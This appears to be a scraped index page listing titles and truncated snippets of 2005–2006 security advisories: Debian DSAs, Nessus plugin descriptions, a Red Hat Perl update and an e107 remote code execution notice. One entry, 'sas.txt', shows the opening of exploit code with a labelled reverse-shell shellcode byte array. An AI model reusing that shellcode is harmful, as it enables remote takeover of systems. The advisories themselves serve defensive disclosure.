Debian DSA-918-1 : osh - programming error

Several security related problems have been discovered in osh, the operator's shell for executing defined programs in a privileged environment. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities : - CVE-2005-3346 Charles Stevenson discovered a bug in the...

Debian DSA-1150-1 : shadow - programming error

A bug has been discovered in several packages that execute the setuid system call without checking for success when trying to drop privileges, which may fail with some PAM configurations. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin...

Debian DSA-917-1 : courier - programming error

Patrick Cheong Shu Yang discovered that courier-authdaemon, the authentication daemon of the Courier Mail Server, grants access to accounts that are already deactivated. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from...

Debian DSA-978-1 : gnupg - programming error

Tavis Ormandy noticed that gnupg, the GNU privacy guard - a free PGP replacement, verifies external signatures of files successfully even though they don't contain a signature at all. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were...

[SECURITY] [DSA 1180-1] New bomberclone packages fix several vulnerabilities

-------------------------------------------------------------------------- Debian Security Advisory DSA 1180-1 [email protected] http://www.debian.org/security/ Martin Schulze September 19th, 2006 http://www.debian.org/security/faq -...

[SECURITY] [DSA 1179-1] New alsaplayer packages fix denial of service

-------------------------------------------------------------------------- Debian Security Advisory DSA 1179-1 [email protected] http://www.debian.org/security/ Martin Schulze September 19th, 2006 http://www.debian.org/security/faq -...

[SECURITY] [DSA 1177-1] New usermin packages fix denial of service

-------------------------------------------------------------------------- Debian Security Advisory DSA 1177-1 [email protected] http://www.debian.org/security/ Martin Schulze September 15th, 2006 http://www.debian.org/security/faq -...

[SECURITY] [DSA 1176-1] New zope2.7 packages fix information disclosure

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1176-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff September 13th, 2006 http://www.debian.org/security/faq -...

[SECURITY] [DSA 1176-1] New zope2.7 packages fix information disclosure

-------------------------------------------------------------------------- Debian Security Advisory DSA 1176-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff September 13th, 2006 http://www.debian.org/security/faq -...

[SECURITY] [DSA 1172-1] New bind9 packages fix denial of service

-------------------------------------------------------------------------- Debian Security Advisory DSA 1172-1 [email protected] http://www.debian.org/security/ Martin Schulze September 9th, 2006 http://www.debian.org/security/faq -...

e107 ibrowser.php zend_has_del() Function Remote Code Execution

The 'e107handlers/tinymce/plugins/ibrowser/ibrowser.php' script included with the version of e107 installed on the remote host contains a programming flaw that may allow an unauthenticated, remote attacker to execute arbitrary PHP code on the affected host, subject to the privileges of the web...

[SECURITY] [DSA 1164-1] New sendmail packages fix denial of service

-------------------------------------------------------------------------- Debian Security Advisory DSA 1164-1 [email protected] http://www.debian.org/security/ Noah Meyerhans August 31st, 2006 http://www.debian.org/security/faq -...

DSA-1164 sendmail - programming error

Bulletin has no description...

[Full-disclosure] [SECURITY] [DSA 1163-1] New gtetrinet packages fix arbitrary code execution

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1163-1 [email protected] http://www.debian.org/security/ Martin Schulze August 30th, 2006 http://www.debian.org/security/faq -...

sas.txt

include include include include include include include include // reverse shellcode unsigned char reverseshell = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"...

[SECURITY] [DSA 1155-1] New sendmail packages fix denial of service

-------------------------------------------------------------------------- Debian Security Advisory DSA 1155-1 [email protected] http://www.debian.org/security/ Martin Schulze August 24th, 2006 http://www.debian.org/security/faq -...

[SECURITY] [DSA 1150-1] New shadow packages fix privilege escalation

-------------------------------------------------------------------------- Debian Security Advisory DSA 1150-1 [email protected] http://www.debian.org/security/ Martin Schulze August 12th, 2006 http://www.debian.org/security/faq -...

Important: Red Hat Security Advisory: perl security update

Updated Perl packages that fix security a security issue are now available for Red Hat Enterprise Linux 4. This update has been rated as having important security impact by the Red Hat Security Response Team. Perl is a high-level programming language commonly used for system administration...

[SECURITY] [DSA 1143-1] New dhcp packages fix denial of service

-------------------------------------------------------------------------- Debian Security Advisory DSA 1143-1 [email protected] http://www.debian.org/security/ Martin Schulze August 4th, 2006 http://www.debian.org/security/faq -...

DSA-1143-1 dhcp - programming error

Bulletin has no description...